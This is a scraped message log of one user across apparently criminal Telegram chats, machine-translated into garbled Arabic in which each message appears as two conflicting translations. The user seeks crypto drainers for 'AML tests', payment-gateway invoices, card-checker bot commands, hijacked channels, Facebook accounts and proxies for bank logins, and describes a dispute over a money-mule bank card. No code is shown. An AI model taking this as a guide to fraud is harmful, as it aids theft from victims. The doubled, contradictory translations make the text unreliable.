اضرب جبهتك بقضيبك.أضرب نفسي على الجبين بقضيبي
B
بونيا2026-03-06 15:18
مثل الرقم خمسة على الشاشة مقاس 2.5😂.تمامًا مثل الصورة 2,5😂
B
بونيا2026-02-19 17:05
إلىكم جميعًا.معكم جميعًا
B
بونيا2026-02-19 17:04
إذا قمت بفتح صفقة، سأضحك.إذا فتحت صفقة، سأضحك
B
بونيا2026-02-19 17:04
قاري؟كونتيننتال؟
B
بونيا2026-02-19 17:04
ها هي إذن.إذن، ها هي قد وافقت
B
بونيا2026-02-19 17:01
لذا، احرص دائمًا على التحقق من المضمون عندما تطلب وجود ضامن.لذا احرصوا دائمًا على ذكر ذلك عندما تسألون عن الضامن
B
بونيا2026-02-19 17:00
سأل عن ضامن ثم اختفى على الفور.سأل عن «الضامن» ثم اختفى على الفور
B
بونيا2026-02-19 17:00
آي كاريناأوي كارينا
B
بونيا2026-02-19 16:59
إذن، هل ستلجأ إلى ضامن؟حسناً، هل ستذهب إلى «الضامن»؟
B
بونيا2026-02-19 16:57
وأنا أيضًا لن أقدم تمويلًا بنسبة مئوية من الإنفاق دون وجود ضامن.أنا أيضًا لن أقوم بالتمويل مقابل نسبة مئوية من الإنفاق دون وجود ضامن
B
بونيا2026-02-19 16:57
أنا؟أنا؟
B
بونيا2026-02-19 16:57
حسنًا، هي نشرت لقطات شاشة وأنت لم تعطيني أي شيء.حسناً، هي نشرت لقطات شاشة، وأنت لم تقدم شيئًا
B
بونيا2026-02-19 16:56
انظر إلى لقطات الشاشة التي نشرتهاانظر إلى لقطات الشاشة التي أرسلتها
B
بونيا2026-02-19 16:55
ألم يذكر شيئًا عن الضامن؟ألم يكتب شيئًا عن الضامن؟
B
بونيا2026-02-19 16:54
أنت غريب الأطوار😂أنت غريب الأطوار😂
B
بونيا2026-02-19 16:53
لقد طلبتَ ضامنًا.هل طلبت من الضامن؟
B
بونيا2026-02-19 16:52
حيثفي أي مكان
B
بونيا2026-02-17 14:37
من سيجهز متجرًا ببعض السيارات الجيدة؟من سيقوم بتجهيز المتجر بسيارات جيدة؟
B
بونيا2026-02-17 12:10
في أي مكان تريده، سيقومون بذلك من أجلك😂في أي مكان، سيقومون بذلك من أجل متعتك😂
-- دردشة إمباير (24 رسالة) --
B
بونيا2026-03-14 13:17
لقد اكتشفت الطريقة بالفعل، لكنني كسول جدًا لأشرحها.لقد فهمت الأمر بالفعل، لكنني كسول عن شرحه
B
بونيا2026-03-14 13:17
سوف يلقنك درساً مهما حدث.سوف يخدعك مهما كانت الظروف
B
بونيا2026-03-12 17:16
بطرق مختلفة.بأشكال مختلفة
B
بونيا2026-03-12 17:08
+ بالإضافة إلى ذلك، هناك الكثير من العواصف التي تهب حالياً.+ هناك عواصف شديدة الآن
B
بونيا2026-03-12 17:07
إذا كان لونه أسود، فأنا أراهنلو كان لونه أسود، لكان قد راهن
B
بونيا2026-03-12 17:07
يعتمد ذلك على نوع العرض؛ إذا كان أبيض، فإن الإجابة هي نعم.يعتمد ذلك على نوع العرض؛ إذا كان أبيض، فالإجابة نعم
B
بونيا2026-03-12 17:06
إنهما عالمان مختلفانهذان عالمان مختلفان، وهما
B
بونيا2026-03-12 17:06
لا يوجد غيرهلا يوجد خيار آخر على الإطلاق
B
بونيا2026-03-12 17:06
يمكنك ضبط الإعدادات بحيث تقتصر على أجهزة الكمبيوتر الشخصية فقطيمكنك ضبط الإعدادات هناك بحيث يقتصر الأمر على أجهزة الكمبيوتر فقط
B
بونيا2026-03-12 17:05
جوجل ليس بالفعالية التي أعتقدها.في رأيي، جوجل ليست بهذه الفعالية
B
بونيا2026-03-12 17:05
حسنًا، أنا لا أستخدم «جوجل»، بل أستخدم «فيسبوك» فقط.حسناً، أنا لا أستخدم «جوجل»، بل «فيسبوك» فقط
B
بونيا2026-03-12 17:05
طالما أن عليك العثور على رباط خلال العملية برمتها.بشرط أنه لا يزال يتعين علينا في نهاية المطاف أن نربط كل هذه الأشياء معًا
B
بونيا2026-03-12 17:04
الرفض، والأحرف التي تتطاير كالعواصف. وما إلى ذلك.الرفضات، والحسابات تتلاشى ببساطة بسبب العواصف. وما إلى ذلك
B
بونيا2026-03-12 17:04
الأمور ليست كلها وردية، يا أخي.لا، هذا ليس كل شيء يا أخي، يا زهور
B
بونيا2026-03-12 17:03
جميع عمليات الاستحواذ المنتظمة في قطاع الطيران تتمتع بثقة أكبرجميعها بطاريات عادية ذات أداء فائق
B
بونيا2026-03-12 17:03
لا توجد وكالات جيدة في السوق في الوقت الحالي.لا توجد شركات وساطة جيدة في السوق حالياً
B
بونيا2026-03-12 17:02
مثير للتوتر أكثر منه مخيفًاإنه أمر يثير التوتر أكثر مما يثير الخوف
B
بونيا2026-03-12 17:02
العملات المشفرة، وغريزة المقامرة، والهوية السوداء، كلها تنفجرالعملات المشفرة، والمقامرة، واليأس، كلها تتدفق
B
بونيا2026-03-12 17:01
آخر ما قامت به المدينة هو اختراق 2d.آخر ما كان يظهر في المدينة كان رائعًا في الأبعاد الثنائية
B
بونيا2026-03-12 17:01
إذا كنت تبحث عني من منطلق مصلحتي الشخصية أو من منظور الميزانية، فستجد أن عمليات التسلق في الأبعاد الثنائية تتطلب إنفاق ما بين 1 و2 ألف زيل على الاختبارات، وهذا المبلغ لن يدوم طويلاً.يمكن أن ينجح الأمر إذا بحثت عن حلول من مواردي الخاصة أو من الميزانية؛ لكن لكي تجد ما يناسب العمل ثنائي الأبعاد، عليك إنفاق 1-2 ألف زيل على الاختبارات، وحتى في هذه الحالة لن يدوم الأمر طويلاً
B
بونيا2026-03-12 17:00
أنا أسكبأنا أسكب
B
بونيا2026-03-12 16:59
(لأنه لا توجد مثل هذه الشروط بالنسبة للعروض المقدمة من الأشخاص ذوي البشرة البيضاء)لأنه لا توجد مثل هذه المتطلبات بالنسبة للعروض البيضاء)
B
بونيا2026-02-14 14:33
من الذي لديه «دراينر» في إطار اختبار AML؟ فقط في حالة وجود «ديب» أو «ريدي» على اسم الضامنهل لدى أحدكم جهاز «دراينر» لاختبار AML؟ إما مع وحدة تخزين فقط أو جاهز للاستخدام مع جهاز «غارانت»
B
بونيا2026-01-11 03:14
هناك شخص ما في قسم «فيسبوك بيت»، وهناك صديق. أحتاج إلى تجديد حساب «فيسبوك»، والسعر قابل للتفاوضهناك من قام بالضرب على فيسبوك، وهناك شتائم. يجب شحن رصيد فيسبوك، وسنتفق على السعر لاحقًا
-- SТYХ СНAT [ STYXMARKET.ST ] (رسالتان) --
B
بونيا2025-12-05 12:04
مطلوب فواتير، Payzaty، Cashfree، Eportal 3dsمطلوب فواتير، Payzaty، Cashfree، Eportal 3ds
B
بونيا2025-11-22 11:14
هل يوجد ضامن للدردشة؟هل يوجد مشرف على الدردشة هنا؟
-- دردشة التحكيم في حركة المرور (رسالتان) --
B
بونيا2025-11-24 14:50
100%100%
B
بونيا2025-11-24 14:49
سيتم اختطاف قناة Tgسيتم اختطاف قناة Тг
-- أداة فحص Raven CC (رسالتان) --
B
بونيا2025-11-21 21:19
/help@SDBB_Bot/help@SDBB_Bot
B
بونيا2025-11-21 21:18
/check/check
-- دردشة متصفح Vision (رسالتان) --
B
بونيا2025-11-14 16:47
شكرًا لك.شكرًا
B
بونيا2025-11-14 16:47
هل كلمة «vicen» تُكتب في اللغة الروسية؟هل «Vizen Work» متوفر باللغة الروسية؟
-- 💬ONE|الدردشة (86 رسالة) --
B
بونيا2025-03-05 17:06
يا رفاق، أرشدوني إلى متجر يمكنني شراء الفوط منه.يا شباب، أرشدونا إلى متجر يمكننا منه شراء الملاعب
B
بونيا2025-03-05 16:22
لا أستطيع حتى أن أبدي أي حماسبل إنه لا يستطيع حتى أن يقوم بعمل مانيكير
B
بونيا2025-03-05 16:22
وبالمثلوكذلك
B
بونيا2025-03-05 16:21
أجيبني بحق الجحيم: هل لدى المرشد غرفة دردشة مع الطلاب أم لا؟اللعنة، هل سيجيبني أحد؟ هل لدى المرشد دردشة مع الطلاب أم لا؟
B
بونيا2025-03-05 16:10
ومن هو صاحبها؟ومن هذا؟
B
بونيا2025-03-05 15:44
الأمر ليس صعبًا، لكن لا توجد كتيبات إرشادية كاملة هنا، بل مجرد دروس تعليمية فقط.الأمر ليس صعبًا هناك، لكن لا توجد كتيبات إرشادية كاملة هنا، بل فقط من خلال المرشدين
B
بونيا2025-03-05 15:42
بشكل عام، نعم، إذا كنت تعرف كيف.في الحقيقة، نعم، إذا كنت تجيد ذلك
B
بونيا2025-03-05 15:42
نصف يومنصف يوم
B
بونيا2025-03-05 15:42
الأول يضم 600 شخص، وهو لا يرد.في الحالة الأولى التي تضم 600 شخص، لا يستجيب
B
بونيا2025-03-05 15:41
إذا كان لديك المال، فاشترِ النسخة التي يطلبون مقابلها 200 دولار.إذا كان لديك المال، فاختر تلك التي تطلب 200 دولار
B
بونيا2025-03-05 13:55
من الذي يجيد الإشارة إلى وجود غرفة دردشة للطلاب؟هل يوجد دردشة للطلاب في قسم الخيال العلمي هناك؟
B
بونيا2025-03-03 15:10
الشيكاتالشيكات
B
بونيا2025-03-03 15:10
الآلة التي تقوم بالتنظيف بالمكنسة الكهربائيةالتي تقوم بتنظيف الغبار بالمكنسة الكهربائية
B
بونيا2025-03-03 15:10
فهمتنعم
B
بونيا2025-03-03 15:10
ربما توجد عاهرات يستخدمن برامج حاسوبية.لا بد أن هناك مخترقين يستخدمون برامج خبيثة
B
بونيا2025-03-03 15:09
كان الأمركان
B
بونيا2025-03-03 15:09
أوه، هذا جيد.أوه، هذا رائع
B
بونيا2025-03-03 15:09
ترينوريويت روروترينوريويت رو
B
بونيا2025-03-03 15:09
ويجري جمعها حالياًويتم جمعها
B
بونيا2025-03-03 15:09
تيب جالس هناك يعبث بالأغلفةتيب جالس يرمي أغلفة رقائق البطاطس
B
بونيا2025-03-03 15:04
لماذا توجد لوحات سيارات أوكرانية؟لماذا الأرقام الأوكرانية؟
B
بونيا2025-03-03 15:03
قلت: «kc».قلت: «ك.ت.ز.»
B
بونيا2025-03-03 15:03
فهمت.لقد فهمت
B
بونيا2025-03-03 15:03
إذا كان الأمر معقدًا، فسوف تفقد قبعتك المستديرة.إذا كان الأمر صعبًا هنا، فسوف تنفجر رأسك
B
بونيا2025-03-03 15:03
تباً، دعنا نقارن عدد المرات التي ستقوم فيها بتشغيل مقطع «rekul» على فيسبوك بينما أرفع الرو عن النار.تباً، هيا، قارن بين عدد المرات التي ستقوم فيها بتشغيل إعادة التحميل على فيسبوك بينما أقوم بتصوير الشاشة
B
بونيا2025-03-03 15:02
للحصول على مرافقةخدمة المرافقة
B
بونيا2025-03-03 15:02
هؤلاء الأشخاص لديهم تطور عقلي متخلف لدرجة أنهم يبدؤون كأوغاد لعينين.هؤلاء الأوغاد طوروا طريقة لإنشاء موقع استمناء لعين
B
بونيا2025-03-03 15:02
اللعنة، لا يوجد هنا سوى «الواكيرز».يا للهول، ما في هنا سوى عمال يدويين
B
بونيا2025-03-03 15:02
ما نوع الطاولات؟ما هي أنواع الطاولات؟
B
بونيا2025-03-03 15:01
ستحصل على 30 إذا كان صوتك جميلاً.30 سيكونون لك إذا كان صوتك جميلاً
B
بونيا2025-03-03 15:01
هناك المزيد من المالهناك أموال أكثر
B
بونيا2025-03-03 15:01
تعال للعمل في شركتي.تعالوا للعمل معي في مركز الرعاية
B
بونيا2025-03-03 15:00
لالا
B
بونيا2025-03-03 14:59
بلاتغامبلاتيغام
B
بونيا2025-03-03 14:59
+ لا أعرف كيف أستخدم ميزة إعادة العرض+ أنا لا أفهم شيئًا في موضوعات البوتات
B
بونيا2025-03-03 14:59
من الصعب العثور على منتجات جيدة.من الصعب أيضًا العثور على هدايا جيدة
B
بونيا2025-03-03 14:58
أم أن هناك إصدار 1.0؟أو 1.0 موجود
B
بونيا2025-03-03 14:58
لا يوجد هنا سوى 2.0 من نوع «فيش».وهنا توجد الأسماك التي يبلغ تيارها 2.0
B
بونيا2025-03-03 14:58
أو الأفضل أن تكون 1.0 بدلاً من 2.0.حسناً، أو ربما 1.0 أفضل من 2.0
B
بونيا2025-03-03 14:57
مع الماموثمع الماموث
B
بونيا2025-03-03 14:57
الإصدار 2.0 لا ينجح إذا ظللت جالسًا بلا عمل.2.0 لا فائدة من الجلوس والثرثرة
B
بونيا2025-03-03 14:57
أنا أكثر ميلاً إلى مجال المرور.لم أعد الأكثر زيارةً
B
بونيا2025-03-03 14:57
إليكم «X's» من Rooها هي علامات «إكس» على اليد
B
بونيا2025-03-03 14:56
لكن هذه ليست مجموعات إعلانيةلكن هذه ليست فرقًا إعلانية
B
بونيا2025-03-03 14:56
نعم، يفعلون ذلك. أعرف شخصًا يفعل ذلك.(يوجد) معارف
B
بونيا2025-03-03 14:56
ليس الأمر كذلك إذا كنت تعرف كيف تجني 400-500 في اليوم.ليس بالأمر الصعب، فإذا كنت تجيد ذلك، يمكن أن تربح 400-500 في اليوم
B
بونيا2025-03-03 14:55
إذن، ما المشكلة في ذلك؟)حسناً، ما الذي نسيته هنا؟ )
B
بونيا2025-03-03 14:55
يوجد رابط للدليلهناك رابط إلى الدليل
B
بونيا2025-03-03 14:54
هذه هي نوعية الأيديهذه هي الأيدي التي ستقود الأمور
B
بونيا2025-03-03 14:54
يسيل لعابه ويحدق بشغف ليحصل على يد لعينة.اللعنة، لكي تبدأ في ممارسة الجنس، يمكنك أن تسيل لعابك وأن تفتح عينيك على مصراعيهما
B
بونيا2025-03-03 14:54
حسنًا، ما المشكلة؟ إنه نفس العمل.حسناً، ما المشكلة هنا؟ إنه نفس العمل
B
بونيا2025-03-03 14:53
سيستغرق الوصول إلى تلك المنطقة شهراًسيتم نقلهم إلى المنطقة خلال شهر
B
بونيا2025-03-03 14:53
ولا يوجد مكان نذهب إليه. إذا كان لديك عقل، فستفهم الأمر. وإذا لم يكن لديك، فستخرج من هنا.نعم، ولا داعي للتفكير في الأمر؛ إذا كان لديك الذكاء، فستفهم؛ وإذا لم يكن لديك، فما الفائدة من ذلك؟
B
بونيا2025-03-03 14:53
ماذا تريد؟ماذا كنت تريد؟
B
بونيا2025-03-03 14:53
إعلانإعلان
B
بونيا2025-03-03 14:52
أنا هنا منذ يومين، والإصدار 2.0 لا يثير اهتمامي. كنت أعتقد أنه رائع.أنا هنا منذ يومين، والإصدار 2.0 لا يثير اهتمامي، كنت أظن أنه سيكون ممتعًا
B
بونيا2025-03-03 14:52
واستمتع بوجبة ضخمةوأن نربي ماموثًا
B
بونيا2025-03-03 14:52
استخدم عقلك للتفكير فيما ستقوله.فكر قليلاً قبل أن تجيب
B
بونيا2025-03-03 14:52
لا توجد أسرارلا توجد أسرار هنا
B
بونيا2025-03-03 14:52
ماذا سيعطيك؟ما الذي سيقدمه لكم؟
B
بونيا2025-03-03 14:52
حسنًا، ما الفائدة من ذلك إذا كان الدليل يحتوي على نفس المعلومات بالضبط؟حسناً، ما الفائدة إذا كانت كل تلك المعلومات موجودة في الدليل؟
B
بونيا2025-03-03 14:51
سيكون لديه الوقت للرد على جميع رسائلكملن نتمكن من الرد على جميع تعليقاتكم
B
بونيا2025-03-03 14:51
يا لها من تدريبات!ما هي هذه الممارسة؟
B
بونيا2025-03-03 14:51
لديه 100 شخص هناك.حسناً، لديه هناك 100 شخص في كل مكان
B
بونيا2025-03-03 14:51
لماذا لا تعطيني بعض المال، وسأعطيك دليل الاستخدام المرفق مع المشبك؟هل يمكنكم أن ترسلوا لي بعض المال؟ سأرسل لكم الدليل من قسم «التثبيت»
B
بونيا2025-03-03 14:50
عند تحديدفي التثبيت
B
بونيا2025-03-03 14:50
لست بحاجة إلى دليل ليتعلم منه كل شيء.ويا جماعة، ما حاجتكم للتدريب؟ الدليل موجود
B
بونيا2025-03-03 14:50
الإصدار 2.0 هو ما هو عليه.2.0 ما كان عليه ما زال عليه
B
بونيا2025-03-03 14:50
ما المشكلة بحق الجحيم؟يا لها من مسألة صعبة
B
بونيا2025-03-03 14:48
هل بدأت ذلك بنفسك؟هل قمت بتشغيله بنفسك بالفعل؟
B
بونيا2025-03-03 14:48
لا جنونلا يعمل على الإطلاق
B
بونيا2025-03-03 14:48
هناك طلب على lkيوجد قتلى في لوك
B
بونيا2025-03-03 14:48
ما الذي يجري في lk؟ما هو «وورك» في لعبة «إل كيه»؟
B
بونيا2025-03-03 14:48
أي واحد من هؤلاء أنتم أيها الأوغاد، كما قلتم.من الذي قال هذه التفاهات، كما عبرت عنها أنت؟
B
بونيا2025-03-03 14:47
لا أفهم ما تقصده هنا.هنا لم أفهم ما قلتَ
B
بونيا2025-03-03 14:46
إذا كانوا قد سجلوا الدخول، فهذا رائع.إذا دخلوا إلى «لك»، فسيكون «زبس»
B
بونيا2025-03-03 14:46
حسنًا، هل يقومون بتسجيل الدخول؟حسناً، هل يدخلون إلى صفحتي الشخصية؟
B
بونيا2025-03-03 14:45
لا أعرف كيف يصورونها.لا أعرف كيف يتم تصويرها
B
بونيا2025-03-03 14:45
كلاب يجب التخلص منها؟هل تريد شراؤها بسعر مخفض؟
B
بونيا2025-03-03 14:45
اللعنة، هناك زر ضغط لعينما هذا الهراء، بل وأضف إلى ذلك التفاهات الأخرى
B
بونيا2025-03-03 14:42
أنا أسكبه بنفسيأنا أصب بنفسي
B
بونيا2025-03-03 14:42
لقد أدركت، اللعنة، أن الأمر ليس من أجل الهراء.لقد فهمت، اللعنة، هذا ليس هراءً
B
بونيا2025-03-03 14:41
يا أخي، لا يبيعون أي شيء بالرقائق هنا، إنها رقاقة يوم الدفع.يا أخي، لا يبيعون هنا أي شيء مقابل الرقائق، بل الرقائق مخصصة للدفع فقط
B
بونيا2025-03-03 14:41
فهمت، لا يوجد مكان لأسكبه فيهلقد فهمت، لا يوجد مكان هنا لأسكبه فيه
B
بونيا2025-03-03 14:40
الإصدار العادي 2.0، على ما أعتقد.2.0 العادية على ما يبدو
B
بونيا2025-03-03 14:40
الأمر ليس وكأنهم يسببون ازدحامًا مروريًاإذن، لا يوجهون حركة المرور إلى هنا على الفور
-- FbStor - دردشة أصحاب المواقع الناجحين! (23 رسالة) --
B
بونيا2025-02-26 07:51
حسناً، افعل ما تشاء، أيّاً كان ما يظهر على وجهك.حسناً، افعل ما شئت هناك، لا يهمني وجه أحد
B
بونيا2025-02-26 07:50
تلميذ، 200₽.حسناً، سأعطيك 200 روبل مقابل سترة المدرسة
B
بونيا2025-02-26 07:50
سيكون ذلك ناجحًاسيفي بالغرض
B
بونيا2025-02-26 07:50
ستجد رجلاً مشرداً في الشارع.في الشارع، اعبر من أمام المتشرد
B
بونيا2025-02-26 07:50
إذن، كل شخص يؤمن بوجهه الخاص، بغض النظر عن هوية صاحب هذا الوجه.إذن الجميع يقومون بالتحقق باستخدام صورهم الشخصية، فمن يهتم بأمر الآخرين؟
B
بونيا2025-02-26 07:50
على وجهك.على وجهه
B
بونيا2025-02-26 07:49
لكن الحقيقة هي، أياً كان الأمر، أنني فعلت ذلك 10 مرات.لكن في الواقع، لا يهم، لدي حوالي 10 حسابات تم التحقق منها
B
بونيا2025-02-26 07:49
إذن أخبرني، أنت لا تقول سوى هراء.إذن، قل لي: هل تتفوه بالهراء؟
B
بونيا2025-02-26 07:49
يمكنكيمكن
B
بونيا2025-02-26 07:49
على وجهك.على وجهه
B
بونيا2025-02-16 20:26
بدلاً من إفسادهم بنوع من التدريب وإخضاعهم لضغوط العمل.وليس كأنه يخدعهم بدورة تدريبية ما ويستغلهم لجذب الزوار
B
بونيا2025-02-16 20:25
مثل المعتاد، يوتيوب وما إلى ذلك.مثل: يوتيوب، وما إلى ذلك
B
بونيا2025-02-15 17:31
XzХз
B
بونيا2025-02-15 17:31
تحت ذريعة التدريبتحت ذريعة التعليم
B
بونيا2025-02-15 17:31
نحو القنواتعلى القنوات
B
بونيا2025-02-15 17:31
إنه مجرد ازدحام ناتج عن توافد الناس.إنه مجرد عدد الزيارات التي يجلبها الناس
B
بونيا2025-02-15 17:31
لذا، يقول هذا الشخص: «اشتركوا في جميع قنواته»فقال هذا الشخص: «اشتركوا في جميع قنواته»
B
بونيا2025-02-15 16:36
ليس عليك أن تكتبيُقترح عدم كتابة «Хуиню»
B
بونيا2025-02-06 15:11
إذا كنت لا تعرف أساسيات كيفية السكب، فسوف...إذا كنت لا تعرف أساسيات مثل كيفية الصب، فماذا ستفعل؟
B
بونيا2025-02-06 15:11
يوجد زر لتغيير aipi، عليك على الأقل البحث عنه في جوجل.بالضغط على الزر هناك يتغير عنوان IP، يمكنك البحث في جوجل إذا أردت
B
بونيا2025-02-06 15:09
يمكنك تغيير شكل aipi الموجود هناك عن طريق تدويره.هناك يمكن تغيير ترتيب العناصر
B
بونيا2025-02-06 15:09
لماذا «1»؟ إنه نفس الهاتف المحموللماذا الرقم 1؟ إنها الهواتف المحمولة
-- CryptoGrab - دردشة المساعدة المتبادلة (10 رسائل) --
B
بونيا2025-02-06 15:31
الأمر ليس بهذه البساطةالأمر ليس بهذه البساطة
B
بونيا2025-02-06 15:31
سهل.إيزي
B
بونيا2025-01-23 20:30
لا يوجد مثال واحدليس هناك مثال واحد
B
بونيا2025-01-23 20:30
ليس من المضحك أنني لم أتمكن من العثور على أي إعلانات عن اختبارات AML على الإنترنت.الأمر المضحك أنني لم أجد أي إعلانات عن اختبارات AML على الإنترنت على الإطلاق
B
بونيا2025-01-23 17:20
لا يوجد أي شيء على قائمة AML على الإطلاق.لا يوجد أي شيء على موقع AML على الإطلاق
B
بونيا2025-01-23 17:20
جربت استخدام aml على فيسبوك للبحث عن ملفات أمريكية، ووجدت أنه فعال حتى مع الحزم القديمة التي لا يمكن العثور عليها على الإنترنتلقد حاولت البحث عن «أمل» على فيسبوك، لكنني لم أجد حتى روابط مفيدة قديمة على الإنترنت
B
بونيا2025-01-23 17:19
حسنًا، ما نوع العرض الذي تخطط له؟حسناً، بشكل عام، ما هو العرض الذي تخطط لتقديمه؟
B
بونيا2025-01-23 17:16
هل تستخدم aml؟هل تصب الأمول؟
B
بونيا2025-01-21 20:38
أي شخص يقوم بنشر محتوى على فيسبوك قد يرغب في توضيح بضعة أسئلةهل من أحد ينشر على فيسبوك ويرغب في توضيح بضعة أسئلة؟
B
بونيا2025-01-20 11:08
هل لدى أي شخص أمثلة على كريوس لعلاج سرطان الدم الحاد (AML)؟هل لدى أحدكم أمثلة على «كريو» لـ «AML»؟
-- رولكس | الدردشة العامة (28 رسالة) --
B
بونيا2024-09-11 15:29
ماذا يفعل الليتوانيون في أي ملعب؟وأي منصة يُستخدمونها في ليتوانيا؟
B
بونيا2024-09-11 15:21
هل تعبث بالبرغي؟هل أنتَ تتلاعب بالبراغي؟
B
بونيا2024-09-11 15:20
الأمر فقط أن هذه المواقع شديدة التقييد، ويستغرق التعامل معها الكثير من الوقت والجهدالمساحات هذه تحدّ من العمل بشكل كبير، وهناك الكثير من المتاعب معها
B
بونيا2024-09-11 15:19
لدي فكرة عن موضوع معين. إذا نفذوها، فسيكون الأمر رائعًا للغاية.لقد ابتكرت فكرة هناك وكتبت عنها؛ إذا نفذوها، فسيكون الأمر رائعًا للغاية
B
بونيا2024-09-11 15:19
لا أرى الكثير من جذوع الأشجار في المزرعة.لا أرى أي شعار على الفينك بشكل خاص
B
بونيا2024-09-11 15:19
هناك بعض الأمور الفوضوية التي تحدث في جميع الأماكن.يا إلهي، هؤلاء الأشخاص يواجهون مشكلة ما مع جميع المنصات
B
بونيا2024-09-11 15:16
هذا ما أقوله، الأمر أشبه بـ«فورد» فوق «فورد».حسناً، هذا ما أقوله: احتيال فوق احتيال
B
بونيا2024-09-11 15:15
لا أستطيع أن أفهم ما الذي أصبح أفضل الآن، فأنا أرى أن الجميع في فنلندا لا يعملون.لا أستطيع أن أفهم على الإطلاق ما الذي يعمل بشكل أفضل الآن، فأنا أرى أن هناك شيئًا ما لا يعمل لدى الجميع في «فينكا»
B
بونيا2024-09-11 15:08
حسنًا، فرصتك 50/50 إذا حالفك الحظ مع الخوادم الوكيلة.حسناً، 50/50 إذا حالفنا الحظ مع البروكسي
B
بونيا2024-09-11 15:07
لكن لكي تفهم الأمر، في الوقت الحالي، مع الوكلاء الفاخرين، حتى على تطبيق «فايبر»، عندما تقوم بتسجيل الدخول، فإن التطبيق يبدأ في التعطل.لكن لكي تفهم، الآن مع البروكسيات الفاخرة، حتى في «فايبر» عندما تدخل، يحدث تزييف
B
بونيا2024-09-11 15:07
حسنًا، لا أعرف شيئًا عن علب الاتحاد الأوروبي.حسناً، أنا لا أفهم شيئاً في البنوك الأوروبية
B
بونيا2024-09-11 15:07
في lkفي ل.ك.
B
بونيا2024-09-11 15:06
كان من المعتاد أن تحتوي متاجر الأطعمة الفاخرة على 10 غرف تبريد كبيرةفي السابق، كانت منتجات «لاكشيري» تدوم لـ 10 جولات
B
بونيا2024-09-11 15:06
حسنًا، الطراز 922 دخل أيضًا بـ 1 ويحافظ على مركزه.حسناً، 922 أيضاً، يدخلون واحدًا ويحتفظون به
B
بونيا2024-09-11 15:05
حتى «برايت» بعد 3 زيارات تثير ذعرهم.حتى في الدردشة الخاصة، بعد 3 محاولات، يتم حظرهم
B
بونيا2024-09-11 15:05
إذا كان هناك وكيل واحد، فيمكنه التعامل مع 1-2 بنوكإذا كان كل بروكسي يتحمل 1-2 بنك تيار
B
بونيا2024-09-11 15:05
حسنًا، هذا يعتمد على البنك المعنيحسناً، هذا يعتمد على البنك
B
بونيا2024-09-11 15:04
غالبًا ما تكون الوكالات قذرة في هراء «لاكشيري»في مواقع الويب الفاخرة، غالبًا ما تكون بروكسيات «هويانيا» غير آمنة
B
بونيا2024-09-11 08:44
هل هو نائم؟هل هو نائم؟
B
بونيا2024-09-11 08:40
أوه، هذه فكرة رائعة.من الذي ابتكر نظام ZBS؟
B
بونيا2024-09-11 08:40
أليس لديهم سوق للسلع المستعملة أو ما شابه؟ولماذا لا يوجد لديهم ما يشبه أسواق السلع المستعملة هنا وهناك؟
B
بونيا2024-09-11 08:40
الوضع سيء للغايةهويفو
B
بونيا2024-09-11 08:39
بيليابيليا
B
بونيا2024-09-11 08:39
هل توجد غرف دردشة؟هل توجد غرف دردشة هناك؟
B
بونيا2024-09-11 08:38
هل يعرف أحدهل يعرف أحد؟
B
بونيا2024-09-11 08:38
هل يستخدم سكان «فينكا» تطبيق «تي جي»؟هل يستخدم الناس تطبيق Telegram في فنلندا؟
B
بونيا2024-09-10 12:14
شكرًا لك.شكرًا
B
بونيا2024-09-10 12:13
ما هو الوقت في فنلندا؟الوقت يمر بسرعة في الفينكا الآن
-- آخر الأخبار/التحقق/الدخل💃🛍 (37 رسالة) --
B
بونيا2024-06-16 17:17
لا أرى أي من المدافعين بشدة عنهالا أرى هنا من يدافع عنها بشدة
B
بونيا2024-06-16 17:17
حسنًا، لقد تم شرح الموقف بالكامل، ومن ثم يتخذ كل شخص قراره بنفسه، وحقيقة أن «أدمين باشا» هو الوحيد الذي يدافع عنها تقول الكثير.حسنًا، لقد شرحتُ الموقف، والآن على كل شخص أن يتخذ قراره بنفسه، أما حقيقة أن «أدمين باشا» هو الوحيد الذي يدافع عنها، فهذا يقول الكثير
B
بونيا2024-06-16 17:15
ولم تدفع مرة أخرىوهي لم تسدد المبلغ مرة أخرى
B
بونيا2024-06-16 17:15
لا، لقد حولت المبلغ إلينا، ثم لم يكن لدينا الحساب الرئيسي اللازم لتحويل المال، لذا كتبنا إلى فيكا كحل أخير.لا، بل هي حولت المبلغ إلينا، لكن لم يكن لدينا وسيلة الدفع الرئيسية لتحويل المال، فاتصلنا بـ«ويكي» كحل أخير
B
بونيا2024-06-16 17:14
في البداية كنا بخير نحن أيضًا، لكن في الآونة الأخيرة أصبح مالك يختفي طوال الوقت.في البداية كان كل شيء على ما يرام عندنا أيضًا، لكن في الآونة الأخيرة أصبحت أموالكم تختفي باستمرار
B
بونيا2024-06-16 17:14
هل أنا أرسل رسائل غير مرغوب فيها؟ أنا جالس هنا وأقول للناس الحقيقة. يمكنك تجاهلها. دع الناس يعرفون كيف تعمل.هل لديّ رسائل غير مرغوب فيها؟ أنا أجلس وأخبر الناس بالحقيقة، فهل يمكنك حذفها؟ ما الذي سيتغير من ذلك؟ دع الناس يعرفون كيف تعملون
B
بونيا2024-06-16 17:13
عندما يكون لديك أحد هذه الأشياءعندما يحدث لكم شيء من هذا القبيل
B
بونيا2024-06-16 17:13
لذا حان الوقت لتفكر في الأمرلذا حان الوقت لتفكروا في الأمر
B
بونيا2024-06-16 17:13
نحن أيضًا نعمل مع شركة «ني» منذ فترة طويلة، وهذه هي المرة الثانية التي نواجه فيها مثل هذه الحالةنحن نعمل معها أيضًا منذ فترة طويلة، وهذه هي المرة الثانية التي يحدث فيها هذا
B
بونيا2024-06-16 17:13
وقد سجلت «جي إس» وقالت: «أنت تعرف كيف يعمل الأمر».وهي سجلت «gs» وقالت إنكم تعرفون كيف تعمل
B
بونيا2024-06-16 17:13
هذه هي القصة بالضبط، دعونا نبدأ من البداية: أخذنا بطاقتها للحصول على المال، وأودعنا 60 ألفًا، فذهبت لسحب المبلغ لتجد أن المال لن يكون موجودًا لأن جهاز الصراف الآلي ابتلع البطاقة، وهذا كل شيء، لقد أهدرنا 60 ألفًا ببساطة.هذا هو بالضبط ما حدث، هيا لنبدأ من البداية: أخذنا منها بطاقة مصرفية وأودعنا فيها 60 ألفًا، فذهبت لسحب المبلغ، ثم قالت إن المال لن يكون متاحًا، بحجة أن جهاز الصراف الآلي ابتلع بطاقتها، وبذلك فقدنا الـ60 ألفًا ببساطة.
B
بونيا2024-06-16 17:11
ليست هي التي تسيطر عليناأليس نحن عندها؟
B
بونيا2024-06-16 17:11
على الرغم من أننا تعرضنا بالفعل لسرقة مبلغ 60 ألفعلى الرغم من أن 60 ألف قد سُرقت منا
B
بونيا2024-06-16 17:11
